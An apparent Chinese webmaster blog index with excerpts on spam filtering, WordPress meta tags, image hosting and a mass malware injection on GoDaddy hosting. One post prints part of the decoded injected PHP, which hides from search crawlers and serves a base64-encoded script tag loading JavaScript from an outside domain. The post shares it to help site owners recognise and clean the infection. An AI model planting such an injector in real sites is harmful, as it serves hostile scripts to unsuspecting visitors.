phpwind中用禁用“敏感词”阻止垃圾信息

phpwind的垃圾广告越来越多，怎么也禁止不了，特别是有一些家伙是人工的，搞不明白怎么这么变态，过1二个星期就重新发来发布一下，头痛，

刚才想到了一个办法，phpwind后台可以禁止一些“敏感词”的，而垃圾信息中，也必定有一些必需的关键词，比如他们的产品的名字，或者QQ号码，把这些设定为敏感词，禁用就可以了，

Read more »

真他妈的无聊，挂木马那么有意思吗

一个月之内，已经有2次这样的事了，

刚才与一网站交换友情链接，进后台去添加，发现后台什么也动不了，

因为对方的网站比我的NB一些，所以有点急，偏偏怎么都动不了，

我开始以为是电信屏蔽了，因为电信对于共享上网的常常会屏蔽，他们的技术就是使用一个js放在页面中间，但是现在我在电脑里面阻止了其js的下载，所以，常常他只是显示一个框架，

Read more »

优酷推出搜酷（soku.com)视频搜索服务

刚才想在优酷找部电影看看，搜索一下，无意中发现他们推出了一个叫“soku 搜酷”的视频搜索服务 ，地址：http://www.soku.com

视频搜索服务的确是一个不错的发展方向，

一是不需要像提供视频下载与视频在线观看一样的服务器与带宽，

二来没有版权的麻烦

第三，小小的搜索服务的广告收入可能会比视频在线观看的广告收入还来得多，特别是如果日后所有的视频都需要付费观看的话，成为下一个百度也是说不定的，

Read more »

godaddy 空间被挂马之后怎么处理？

5月13号：有一哥们已经找到了办法了，到下面的地址去看看吧，

http://bbs.idcspy.com/thread-95826-1-1.html

解压后上传到根目录，用浏览器打开，只适用昨天出现的恶意代码，至于什么恶意代码可以查看下我的帖子

如果在执行的过程中出现超时或者500错误，那你只能一个目录一个目录执行

我的几个网站都已清理完毕，插件来源于国外某论坛

如成功清除，会现出如下提示

Site clean up by http://sucuri.net
This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

If you need help, contact dd@sucuri.net or visit us at http://sucuri.net/index.php?page=nbi

Malware removed.
Empty lines removed.

Completed.

—— – - – - – ——— – - – - – -

昨天关于临时处理的部分：

如果网站被挂马，首先要清楚是挂在那里，虽然木马都是使用js ,而且一般就放在尾部(footer)，但是挂的方式有很多种，

godadd空间最近发生的事来说，是在php文件中植入了一个加密的php代码，通过这个代码在footer写了一个js，具体请看前一篇，

那要怎么处理？

首先，你应该保护你的会员，可以把域名转向到其它IP，或网址，让中招的网址无法访问，

做为站长，你不能让你的会员因为访问你的网站而中招，

但今次因为其中招的主要是php文件，静态文件并没有中招，我们可以删除php文件，你现在应该做的是把根目录（首页）下的所有能访问到的php文件删除，如index.php thread.php

注意,discuz的配置文件是在根目录的，不要删除配置文件，我就一不小心删除了，到时可能要重新安装新建一下

Read more »

godaddy空间大面积被挂马

下午觉得有点奇怪，我在ubuntu里怎么也出现查杀病毒的信息，看到下面这个图片，我还以为真的是我的电脑有问题（因为同时开着xp虚拟机），后面出现要下载的，想想不对，就看了一下那个网址，

因为我只是打开了firefox上次打开的网页，而且都是我自己的网站，所以还是不太相信，就刷新了一下自己的网站，发现竟然被挂马了，，

一网友的截图

我原以为是phpwind代码的问题，到里面看了一下，发现里面的模板并没有问题，又到首页把index.php换了一下，发现还是没有用，可能是感染了好几个文件

后面想着可能是godaddy空间的问题，到idcspy的godaddy版块一看，发现N多的朋友在说这件事，

真是郁闷啊，

他们是在php的头部加入了一个加密的php代码,解密之后就是这

<?php
if (function_exists(‘ob_start’) && !isset($GLOBALS['mr_no']))
{
  $GLOBALS['mr_no'] = 1;
if (!function_exists(‘mrobh’))
{
if (!function_exists(‘gml’))
{
function gml()
{
if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr
($_SERVER["HTTP_USER_AGENT"], "yahoo")))
{
return base64_decode(
"PHNjcmlwdCBzcmM9Imh0dHA6Ly9pbmRlc2lnbnN0dWRpb2luZm8uY29tL2xzLnBocCI+PC9zY3JpcHQ+");
}
return "";
}
}
if (!function_exists(‘gzdecode’))
{
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
{
        $R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr
($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
        $RBE4C4D037E939226F65812885A53DAD9 = 10;
        $RA3D52E52A48936CDE0F5356BB08652F2 = 0;
if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4)
{
          $R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack(‘v’, substr($R5A9CF
//……..
?>

这个代码会自动在php网页的底部输出一个js

Read more »

真的要淡定啊

今天site了一下几个站，也关注了二个主要的关键词，我的还是没有上去，却发现了一个怪现像，一些敏感关键的网站却上来了，

不再是以前的以大型网站的目录占首页的局面了，应该是开放了一些吧，，另外还发现排名在第二页的有一个都已经是停放了的域名，

都不知道他们在搞什么，看来还真是要淡定才行啊，哈哈，

为wordpress首页head中添加description与关键词

wp是有一个description，不过那只是在首页上出现的，并没有加到head的meta中，

也许西方国家都不需要这二样了吧，因为url中就直接写上关键词了，再写一个不是多余？

但是我们最好还是用一下，

wordpress的head文件是直接放在header.php文件中，所有的页面都是一样的，所以需要用到一些检查函数，，wp函数中有一 is_home() ，是检查页面是否为首页的，

用这个写个简单的代码就可以了，如果为首页时 if (is_home())，就显示(echo)description与关键词，如果不是，就不会显示，

2010年6月6号修改：因为2.9以后的版本is_home这个函数无法再检查出是首页还分页，所以还需要加一个条件?&&!is_paged()

if (is_home()&&!is_paged())

Read more »

安装phpAce的 php image host用自己的空间做图床

最近想在taobao上做些小生意，但是发现taobao真的什么都要钱，开通了旺铺还需要另外再加5块钱一个月买图片空间，就是说50块钱一个月还没有图片空间给你，要怎么说他们，

其它国内的图床动不动就要钱，而且以MB算，国外的又常常用不了，于是想用自己的空间来做个做图床，找了一下图床（image host）的代码，发现有一个叫phpAce 的php image host感觉 还不错，就下载了下来，安装花了了2个多小时，都是英文太差的原因，这里把一一的说明给大家，

phpace不是自动安装的，

Read more »

垃圾广告对准了dedecms

因为现在的很多CMS 都有文章 的发布功能，在论坛反垃圾功能增强之后，这些垃圾广告又对准了dedecms，我的好几个站都有垃圾广告的出现，如果是普通的站，我禁止会员发布也就可以了，但偏有一个需要会员发布信息的网站，

目前只能在后台的 “DedeCms系统配置参数：” “会员设置”里的“是否允许用户空间显示未审核文章：”  禁止未审核的文章显示，

Read more »

前些天网站被k之迷

前些天，网站莫名被k，我觉得奇怪，后面又恢复了，但我一直不知道其中的原因，直到刚才，我发现我的首页被收录到了另外一个页面，

原因可能是这样的，我换空间之后，但dns一直没有生效（原因是我之前还有一些设置没有设置好，我还是用原来的数据库的，所以反复的改了几次a记录），但是我又在原来的空间中删除了这个域名的绑定，当这个域名还是指向原来的空间时，空间就显示为那个空间的根目录，

Read more »